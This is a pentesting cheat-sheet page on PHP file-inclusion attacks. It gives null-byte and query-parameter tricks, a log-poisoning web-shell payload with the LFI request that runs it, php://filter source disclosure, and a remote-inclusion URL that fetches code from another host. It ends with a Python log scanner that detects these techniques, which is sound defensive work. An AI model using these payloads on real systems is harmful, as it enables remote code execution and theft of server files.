# File inclusions (LFI, RFI)

> A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/File_inclusion_vulnerability)

* [GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF](https://github.com/swisskyrepo/PayloadsAllTheThings)

## PHP settings

[PHP Security: Local & Remote File Inclusion - Webmaster Tipps](https://www.webmaster-tipps.de/php-sicherheit-local-file-inclusion-und-remote-file-inclusion/)

* `allow_url_include`
* `allow_url_fopen`

## String termination

Example:

```php
// The attacker-controlled FILE parameter is concatenated into the include path
include("path/" . $_GET['FILE'] . ".php");
```

If we want to get rid of the enforced `.php` extension, we must terminate the string before the extension is appended. The following two ways may let you achieve exactly that.

### 1. Null byte poisoning

Terminate the string with a null byte: `%00` (PHP < 5.3.4).

```php
filename.txt%00
```

### 2. Query parameter

Add a query parameter.

```php
filename.txt?bla=
```

The above example then becomes `path/filename.txt?bla=.php`; the query parameter is ignored and the file is loaded as desired.

## Local File Inclusion (LFI)

See also [Directory traversal](/the-pentesters-cheat-sheet/exploitation/web/directory-traversal.md).

### Log file poisoning

If requests are written to a log file and you are able to make a PHP script read and interpret those logs (LFI), you may even be able to gain remote code execution (RCE).

#### Example

Connect to the target.

```bash
nc -nv <ip> <port>
```

Write some PHP that gets written into a log file.

```php
<?php echo shell_exec($_GET['cmd']); ?>
```

Exploit an LFI to gain RCE.

```url
http://website.com/addguestbook.php?name=a&comment=b&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00
```

### Read source files

Use the PHP filter wrapper and base64 encoding to bypass PHP execution and retrieve the source code.

```url
php://filter/convert.base64-encode/resource=<file>
```

## Remote File Inclusion (RFI)

```url
http://website.com/addguestbook.php?name=a&comment=b&LANG=http://10.11.0.5/evil.txt%00
```
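
Seen from the defending side, each technique on this page (traversal, null byte, `php://` wrapper, remote URL, PHP written into a log) leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original cheat sheet, that flags those traces in Apache-style log lines; the rule names, function names and the sample log are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')  # "METHOD target HTTP/x.y"
# Rule names are this example's own; each maps to a technique on this page.
PARAM_RULES = {
    "traversal": re.compile(r"\.\.[/\\]"),
    "null_byte": re.compile(r"\x00"),
    "php_wrapper": re.compile(r"^php://", re.I),
    "remote_url": re.compile(r"^(?:https?|ftp)://", re.I),
}
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)

def fully_decode(value, rounds=3):
    """Percent-decode several times so double-encoded input (%252e) is caught."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return the sorted indicator names found in one access-log line."""
    hits = set()
    if PHP_TAG.search(fully_decode(line)):
        hits.add("php_in_log")  # PHP written into the log (log poisoning)
    match = REQUEST.search(line)
    if match:
        query = match.group(1).partition("?")[2]
        for _name, raw in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(raw)
            hits.update(n for n, rx in PARAM_RULES.items() if rx.search(value))
    return sorted(hits)

def scan(lines):
    """Return (line_number, indicators) for every line with at least one hit."""
    return [(i, h) for i, h in enumerate(map(classify, lines), 1) if h]

# Constructed sample log (not real traffic); requests mirror the page's examples.
PREFIX = '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] '
SAMPLE_LOG = [
    PREFIX + '"GET /addguestbook.php?name=a&comment=b&LANG=en HTTP/1.1" 200 512',
    PREFIX + '"<?php echo shell_exec($_GET[\'cmd\']); ?>" 400 226',
    PREFIX + '"GET /addguestbook.php?cmd=ipconfig&LANG=../../xampp/apache/logs/access.log%00 HTTP/1.1" 200 2048',
    PREFIX + '"GET /addguestbook.php?LANG=http://10.11.0.5/evil.txt%00 HTTP/1.1" 200 90',
    PREFIX + '"GET /addguestbook.php?LANG=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 900',
    PREFIX + '"GET /addguestbook.php?LANG=%252e%252e%252fconfig HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The benign first line produces no hit; a `php_in_log` hit followed by a `traversal` hit that targets a log path is the sequence to escalate.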


